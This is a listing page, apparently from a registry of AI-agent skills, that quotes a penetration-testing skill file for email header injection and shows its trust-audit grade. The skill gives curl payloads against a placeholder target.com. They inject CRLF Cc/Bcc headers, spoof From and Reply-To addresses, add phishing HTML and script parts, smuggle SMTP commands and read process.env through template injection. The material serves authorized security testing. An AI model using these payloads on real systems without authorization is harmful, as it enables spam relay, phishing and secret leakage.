Testing For Email Header InjectionSAFE
817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains ·
Overview
817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains ·
6c59587be632OBSERVED · 2026-10-07What it tells the agent
The instruction file, verbatim from the audited commit — this is the text the model reads, and the surface the audit's instruction layer examines. Quoted here so you can judge it without cloning anything.
--- name: testing-for-email-header-injection description: Tests web application email functionality (contact forms, password reset, newsletter subscriptions) for CRLF/SMTP header injection using Burp Suite and OWASP ZAP, checking whether attackers can inject headers, modify recipients, or abuse forms for spam relay. Use when testing any user-input-driven email-sending feature during a penetration test. domain: cybersecurity subdomain: web-application-security tags: - email-injection - smtp-injection - crlf-injection - header-injection - spam-relay - contact-form - email-security version: '1.0' author: mahipal license: Apache-2.0 nist_csf: - PR.PS-01 - ID.RA-01 - PR.DS-10 - DE.CM-01 mitre_attack: - T1190 - T1059.007 - T1505.003 - T1083 - T1055 --- # Testing for Email Header Injection ## When to Use - When testing contact forms, feedback forms, or "email a friend" functionality - During assessment of password reset email functionality - When testing newsletter subscription or notification email systems - During penetration testing of applications that send emails based on user input - When auditing email-related API endpoints for header injection ## Prerequisites - Burp Suite for intercepting and modifying HTTP requests - Understanding of SMTP protocol and email header structure - Knowledge of CRLF injection techniques (\r\n sequences) - Test email accounts for receiving injected emails - Access to application features that trigger email sending - SMTP server logs access for monitoring injection attempts ## Workflow ### Step 1 — Identify Email Injection Points ```bash # Identify form fields that end up in email headers: # - "From" name or email address fields # - "To" or "CC" fields in sharing features # - Subject line inputs # - Reply-To fields # Common endpoints: # POST /contact - Contact forms # POST /share - Share via email features # POST /invite - Invitation systems # POST /api/send-email - Email API endpoints # POST /forgot-password - Password reset forms # Test basic functionality first curl -X POST http://target.com/contact \ -d "name=Test&[email protected]&subject=Hello&message=Test message" ``` ### Step 2 — Test for CRLF Header Injection ```bash # Inject additional email headers via CRLF in the email field curl -X POST http://target.com/contact \ -d "name=Test&[email protected]%0ACc:[email protected]&message=Test" # Inject BCC header curl -X POST http://target.com/contact \ -d "name=Test&[email protected]%0ABcc:[email protected]&message=Test" # Inject via the name field curl -X POST http://target.com/contact \ -d "name=Test%0ACc:[email protected]&[email protected]&message=Test" # Inject via subject field curl -X POST http://target.com/contact \ -d "name=Test&[email protected]&subject=Hello%0ABcc:[email protected]&message=Test" # Try different CRLF encoding variants # %0D%0A (CRLF) curl -X POST http://target.com/contact \ -d "[email protected]%0D%0ACc:[email protected]" # %0A (LF only) curl -X POST http://target.com/contact \ -d "[email protected]%0ACc:[email protected]" # %0D (CR only) curl -X POST http://target.com/contact \ -d "[email protected]%0DCc:[email protected]" # Double encoding curl -X POST http://target.com/contact \ -d "[email protected]%250ACc:[email protected]" ``` ### Step 3 — Inject Custom Email Content ```bash # Override email body by injecting Content-Type and body curl -X POST http://target.com/contact \ -d "[email protected]%0AContent-Type:text/html%0A%0A<h1>Phishing</h1>" # Inject additional MIME parts curl -X POST http://target.com/contact \ -d "[email protected]%0AContent-Type:multipart/mixed;boundary=boundary123%0A--boundary123%0AContent-Type:text/html%0A%0A<script>alert(1)</script>" # Override From header for email spoofing curl -X POST http://target.com/contact \ -d "[email protected]%0AFrom:[email protected]" # Inject Reply-To for phishing curl -X POST http://target.com/contact \ -d "[email protected]%0AReply-To:[email protected]" ``` ### Step 4 — Test IMAP/SMTP Injection ```bash # IMAP command injection via email field curl -X POST http://target.com/webmail/search \ -d "query=test%0AEXAMINE INBOX" # SMTP command injection curl -X POST http://target.com/api/send \ -d "[email protected]%0ARCPT TO:[email protected]" # SMTP VRFY command injection curl -X POST http://target.com/api/verify \ -d "[email protected]%0AVRFY admin" # Test SMTP relay abuse curl -X POST http://target.com/contact \ -d "[email protected]%0ATo:[email protected]%0ATo:[email protected]%0ATo:[email protected]" ``` ### Step 5 — Test JSON-Based Email APIs ```bash # JSON API header injection curl -X POST http://target.com/api/send-email \ -H "Content-Type: application/json" \ -d '{"to":"[email protected]\nCc:[email protected]","subject":"Test","body":"Test"}' # Array injection for multiple recipients curl -X POST http://target.com/api/send-email \ -H "Content-Type: application/json" \ -d '{"to":["[email protected]","[email protected]"],"subject":"Test","body":"Test"}' # Template injection in email body curl -X POST http://target.com/api/send-email \ -H "Content-Type: application/json" \ -d '{"to":"[email protected]","subject":"Test","body":"{{constructor.constructor(\"return process.env\")()}}"}' ``` ### Step 6 — Validate Findings ```bash # Check if injected CC/BCC emails were received # Monitor [email protected] inbox for received copies # Verify header injection via email raw source # In received email, check "View Original" or "Show Headers" # Look for injected Cc:, Bcc:, From:, or Reply-To: headers # Test if the application is usable as a spam relay # by injecting multiple recipients in BCC # Document the full injection chain # 1. Injection point (which field) # 2. Encoding required (CRLF, URL encoding) # 3. Impact (spam relay, phishing, data theft) ``` ## Key Concepts | Concept | Description | |---------|-------------| | CRLF Injection | Injecting carriage return and line feed chara
Trust audit
SAFEgrade B · trust 89/100 Nothing in the source contradicts what it says it does. Grade A is reserved for packages that have also passed the behavioural sandbox.
| Layer | What it checks | Result |
|---|---|---|
| L0 | Provenance & inventory | PASS |
| L1 | Static analysis of the code | PASS |
| L2 | Instruction surface (what it tells the agent) | PASS |
| L3 | Class-specific surface | PASS |
| L4 | Behavioural (sandbox) | SKIPPED |
What the source does
- Filesystem
- none-observed
- Network
- declared (2 observation(s))
- Shell
- none-observed
- Dependencies
- pinned
- Secrets in source
- none-found
Findings (0)
No findings outside the package's declared scope.
Gates applied: no_behavioural_pass.
6c59587be632full audit observations/trust-audit/skill/mukul975__testing-for-email-header-injection.json · Report an issue / request a re-scanAudit history
Every audit this skill has had.
| Date | Source | Verdict | Grade | Score | Change |
|---|---|---|---|---|---|
| 2026-10-07 | 6c59587be632 | SAFE | B | 89 | first audit |
Questions
What does the Testing For Email Header Injection skill do?
817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains ·
Is Testing For Email Header Injection safe to install?
The audit found nothing in the source that contradicts what it says it does, and graded it B (89/100). Grade A is held back for packages that have also passed a sandboxed behavioural run, which is why a clean skill reads B.
What can Testing For Email Header Injection access on my machine?
The audit observed that it reaches the network. Each of those is consistent with what it says it does. Secrets in the source: none found.
How current is this page?
The grade is for one exact copy of the source (6c59587be632), read on 2026-10-07. The repository is watched, and a new audit runs when it changes — this is the first audit.